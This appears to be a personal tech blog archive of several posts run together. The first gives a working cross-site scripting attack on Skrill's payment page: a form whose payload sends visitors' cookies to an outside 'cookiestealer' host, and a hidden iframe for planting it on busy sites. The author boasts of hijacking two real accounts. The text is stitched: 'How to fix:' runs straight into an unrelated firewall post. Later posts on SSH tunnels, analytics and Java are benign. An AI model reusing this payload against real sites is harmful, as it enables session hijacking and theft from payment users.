XSS on payment form on skrill.com

I have been studying the wonderful world of hacking over the last few months. A book I read on pen-testing suggested looking at http://www.reddit.com/r/xss for XSS news, new methods, examples, etc.

XSS (cross-site scripting) is basically when an attacker can get their own JavaScript inserted into a website's pages, because the site echoes user-supplied input into the HTML without escaping it.

I had never used reddit before; now I am hooked on it. I always thought of XSS as a strange problem and didn’t understand how someone could attack your website or really do anything with XSS other than redirect users to another website, and to achieve even that the XSS would have to be stored in a database or similar and displayed to other users.

Then I realized that XSS is one of the worst holes you can have on your website. An XSS attack can be used to steal your cookies, and whoever holds your session cookie is effectively authorized as you, with access wherever you have access.

So today I saw this: http://www.reddit.com/r/xss/comments/2jea1h/xss_on_payment_form_skrill/

This was a brief skrill.com XSS vulnerability. It was active for about 24 hours. This guy found a form where input is not filtered. Specifically, the parameter shown in the form below (the payload goes into detail2_text) is reflected back into the page unescaped, so you can push JavaScript code into that website.
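To make the sink concrete, here is an added example (mine, not code from the post, the reddit thread or Skrill) that models a server rendering the detail2_text parameter back into the form's value attribute three ways: straight concatenation, a one-pass script-tag blacklist, and proper HTML encoding. The input markup is an assumption about what the Skrill page looked like; the payload is the post's own, entity-decoded into the raw string the browser actually submits.

```javascript
// Added example, not code from the original post or from Skrill. Models the
// reflection sink: the payment page echoes detail2_text into an
// <input value="..."> attribute. The input markup below is an assumption about
// that page; the payload is the one from the post, decoded from HTML entities.

// Raw value submitted for detail2_text (entity-decoded version of the post's payload).
const PAYLOAD =
  '"><script language="JavaScript">document.location="http://www.mysite.com/cookiestealer/index.php?cookie=" + document.cookie;document.location="http://www.mysite.com"</script>';

// Vulnerable: untrusted input concatenated straight into an attribute value.
// The leading "> closes the attribute and the tag, so the <script> lands in the page.
function renderUnsafe(detail2) {
  return `<input type="text" name="detail2_text" value="${detail2}" class="col-md-9 col-xs-12"/>`;
}

// Common but wrong fix: strip <script> tags in a single, non-recursive pass.
// A nested tag survives the strip and its halves reassemble into a working tag.
function renderBlacklist(detail2) {
  const stripped = detail2.replace(/<\/?script[^>]*>/gi, '');
  return `<input type="text" name="detail2_text" value="${stripped}" class="col-md-9 col-xs-12"/>`;
}

// Correct fix: HTML-encode every character that can change attribute or tag
// context before the value is written into the page.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderEscaped(detail2) {
  return `<input type="text" name="detail2_text" value="${escapeHtml(detail2)}" class="col-md-9 col-xs-12"/>`;
}

// Does the rendered HTML contain a real <script ...> tag (not an encoded one)?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Bypass for the blacklist: the inner <script> is removed, the outer halves join up
// into "<script language=...>" and "</script>" again.
const NESTED_PAYLOAD = PAYLOAD
  .replace('<script', '<scr<script>ipt')
  .replace('</script>', '</scr</script>ipt>');

// Summary of which renderer lets which payload execute.
function summary() {
  const renderers = { unsafe: renderUnsafe, blacklist: renderBlacklist, escaped: renderEscaped };
  const result = {};
  for (const [name, render] of Object.entries(renderers)) {
    result[name] = {
      plain: containsScriptTag(render(PAYLOAD)),
      nested: containsScriptTag(render(NESTED_PAYLOAD)),
    };
  }
  return result;
}

console.log(summary());
```

Run it with node: only the encoding version keeps both payloads inert, and the blacklist falls to the nested tag. Encoding has to match the context the value lands in (attribute, element text, JavaScript string), and the session cookie should additionally be flagged HttpOnly so that document.cookie cannot read it even if a script does get in.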
So, how to exploit it (I actually tried this and it worked).

You will have to create a form that submits the payload to the payment page:

  <!-- the payload is carried in detail2_text; all other fields are ordinary payment parameters -->
  <form id="myform" action="https://www.moneybookers.com/app/payment.pl">
    <input type="hidden" name="pay_to_email" value="mesyre@gmail.com">
    <input type="hidden" name="language" value="EN">
    <input type="hidden" name="amount" value="3">
    <input type="hidden" name="currency" value="EUR">
    <input type="hidden" name="amount2_description" value="Product Price:">
    <input type="hidden" name="amount2" value="2">
    <input type="hidden" name="detail1_description" value="Product:">
    <input type="hidden" name="detail1_text" value="test">
    <input type="hidden" name="amount3_description" value="Product Price:">
    <input type="hidden" name="amount3" value="1">
    <input type="hidden" name="detail2_description" value="Product:">
    <input type="hidden" name="detail2_text" value="&quot;&gt;&lt;script language= &quot;JavaScript&quot;&gt;document.location=&quot;http://www.mysite.com/cookiestealer/index.php?cookie=&quot; + document.cookie;document.location=&quot;http://www.mysite.com&quot;&lt;/script&gt;">
    <input type="submit" value="h">
  </form>

The cookie stealer is a basic script (it is included in the link above). Now, because people don’t submit forms they don’t know, we add some JavaScript to auto-submit the form:


And load it into some other (preferably high-traffic) website:

	<iframe width="0" height="0" src="http://www.mysite.com/xss.php"></iframe>

Then what happens: every time someone visits your website, you get their skrill.com cookies (provided they are logged in to Skrill in that browser, and the session cookie is not flagged HttpOnly, which would keep it out of document.cookie). Then you visit skrill.com with their cookies, and you are logged in as them.

I actually tried this. I left it online for 10 hours on a high-traffic website, I got 2 valid cookies, used them and logged in. I could easily have sent the money to my account. Now, actually being able to do that is more important to me than actually stealing from the poor guys that I exploited, but it was sure the highlight of my hacking attempts. It’s not every day that you can say you hacked skrill.com.

And it was all done with kindergarten-level knowledge in terms of hacking and some luck.

I always thought that those holes don’t exist anymore, especially in large websites. But I was wrong. Developers make mistakes every day.

This was online for a full day before they fixed it.

How to fix:

RESULT: csf will not function on this server due to FATAL errors from missing modules [4]

I tried to install CSF (ConfigServer Security & Firewall) on a Linux machine running cPanel.

I got the error:

RESULT: csf will not function on this server due to FATAL errors from missing modules [4]

As it turns out, this is an OpenVZ issue: a container shares the host kernel, so the iptables modules csf needs have to be loaded on the host and allowed for the container there. I found this little page explaining what to do (note that the last step restarts the vz service, and with it every container on the node):


I copy it here just in case this page disappears or something:

You do that on the HOST operating system:

Modify IPTABLES_MODULES in /etc/sysconfig/iptables-config:

    IPTABLES_MODULES="ip_conntrack_netbios_ns ipt_conntrack ipt_LOG ipt_owner ipt_state ip_conntrack_ftp iptable_nat ip_nat_ftp ip_tables ipt_multiport iptable_filter ipt_limit"

then launch:

    service iptables restart

to restart the iptables service. Then modify IPTABLES in /etc/vz/vz.conf:

    IPTABLES="ipt_REJECT ipt_tos ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp ip_tables ipt_conntrack ip_conntrack_ftp ipt_LOG ipt_owner"

then launch:

    /etc/init.d/vz restart

Movie information APIs for you

Hello and welcome,

I am thinking of creating some website for users to comment on movies. But since there are a lot of movies, there are 2 ways to get all the movie data:

  • Allow the users to insert their favorite movie and all their data,
  • Find some API and collect the information automatically.

I don’t like the first option very much. Users are generally ignorant and lazy, and someone has to work full time to review everything. Since I only love creating sites and hate maintaining them, I try to build my websites in such a way that they work on their own.

So I have researched APIs that give me movie information.

So far I found:


This one looks good. It has search functions and gets data from IMDB.com and Rotten Tomatoes. It is keyed on the IMDb movie id.


Rotten Tomatoes API. Looks good


This one is based on TV series. I haven’t tried it, but I mention it in case someone wants to do something involving TV shows.


Another movie and actor info API. One thing worth mentioning is that their responses include

"alternate_ids": {"imdb": "1403865"},

That is the IMDb id. It is useful when you already have a database with IMDb ids (like me) or you want to combine data with other APIs that use IMDb ids.


This one is about TV series, and it also has the TV schedules for GB, CA or AU.

As you can tell, I haven’t reviewed them; I just had a quick look. So if you have tried any of these, please leave a comment telling me what you liked and what you didn’t.

Thanks for visiting.

How to make notepad++ Functions List plugin to work with Windows 7

I use Notepad++ daily for PHP development. I love it; it’s simple and powerful at the same time.

One good feature is the plugins that are available. One of them is Functions List.

If you try to install that plugin on a Windows 7 machine, it will not work properly. You have to do some extra steps (found here).

1. Download the Function List plugin.
2. Copy the files C++.flb, FunctionListRules.xml and Gmod Lua.bmp to: [DRIVE LETTER]:\Users\[YOUR USER NAME]\AppData\Roaming\Notepad++\plugins\config
3. Copy the file FunctionList.dll to your installation folder, for example: [DRIVE LETTER]:\Program Files (x86)\Notepad++\plugins

Another good tutorial to enhance the capabilities of this plugin for php is found here: http://www.danielkassner.com/2010/01/22/using-notepads-function-list-plugin-for-php-development

Redirect all windows traffic through ssh tunnel – socks proxy – http proxy

So you have built an ssh tunnel (http://www.r00t.gr/how-to-easily-create-a-ssh-tunnel-using-windows-in-startup-boot/) and you want to redirect all your traffic through it. You can configure every browser, email client and uTorrent to use the proxy, or you can download Proxifier (http://www.proxifier.com/download.htm) and set it up to route everything through the one proxy. It’s really cheap, $40 for a lifetime licence.

Cool tools like that, I don’t mind paying for!

I use that trick on my personal computers to encrypt all my traffic through one of my dedicated servers.

How to easily create a ssh tunnel using windows in startup (boot)

I like encryption a lot. You might not know this, but your ISP logs everything you do on the web, by law in most countries.

I don’t like someone else having access to my emails and the list of websites that I use.

I have known for a long time about ssh magic and all the spells you can do with it. One of them is a dynamic port forward (ssh’s -D option): you open an ssh connection to a remote server, it exposes a local SOCKS proxy, the “tunnel”, and you configure your traffic to go through that tunnel.

This great free program, MyEnTunnel (you can download it here: http://nemesis2.qx.net/pages/MyEnTunnel), creates the connection for you and, if you want, does so automatically on boot.

Of course you need ssh access to ANY remote server. Anything will do: a VPS, a dedicated server or some other person’s house.

Take a look at the settings:

(screenshot: ssh settings)

Then you can go to Firefox and set up a SOCKS proxy that uses localhost, port 1234. Also enable remote DNS (network.proxy.socks_remote_dns in about:config), otherwise name lookups still go straight to your ISP and leak the list of sites you visit.

Then everything is redirected through your ssh connection, and the best part is that all traffic is encrypted between your machine and the ssh server. Past that server it leaves as ordinary traffic, so the server’s network sees what your ISP used to see.

How to install git on centos with yum

# Add the repository
rpm -Uvh http://repo.webtatic.com/yum/centos/5/latest.rpm
# Install the latest version of git
yum install --enablerepo=webtatic git-all

Clean, simple and it works!

How to make google analytics work with jquery mobile site

Google Analytics doesn’t work out of the box with jQuery Mobile websites: jQuery Mobile loads pages via Ajax and changes the URL hash instead of doing full page loads, so the tracking snippet only fires once. Luckily, I found the way to make this work.

Basically you have to break the code into 2 parts: the usual loader, and a pageshow handler that records a pageview every time jQuery Mobile shows a page:

    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-xxxxxx-xx']);
    (function() {
      // Part 1: the standard asynchronous ga.js loader
      var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();

    // Part 2: jQuery Mobile swaps pages via Ajax, so record a pageview on every pageshow.
    // .live() was removed in jQuery 1.9; on newer versions use
    // $(document).on('pageshow', '[data-role=page]', ...) instead.
    $('[data-role=page]').live('pageshow', function (event, ui) {
        try {
            var hash = location.hash;
            if (hash && hash.length > 1) {
                _gaq.push(['_trackPageview', hash.substr(1)]);
            } else {
                _gaq.push(['_trackPageview']);
            }
        } catch(err) {
            // never let a tracking error break page navigation
        }
    });

Just copy your ID from the usual Analytics code and put it in place of UA-xxxxxx-xx.

More info here and here

How to filter a string and keep only numbers with java

Just run this code:


str = str.replaceAll("[^0-9]+","");

This means: replace every run of characters that are not digits (0-9) with the empty string (""), so "abc123-45" becomes "12345".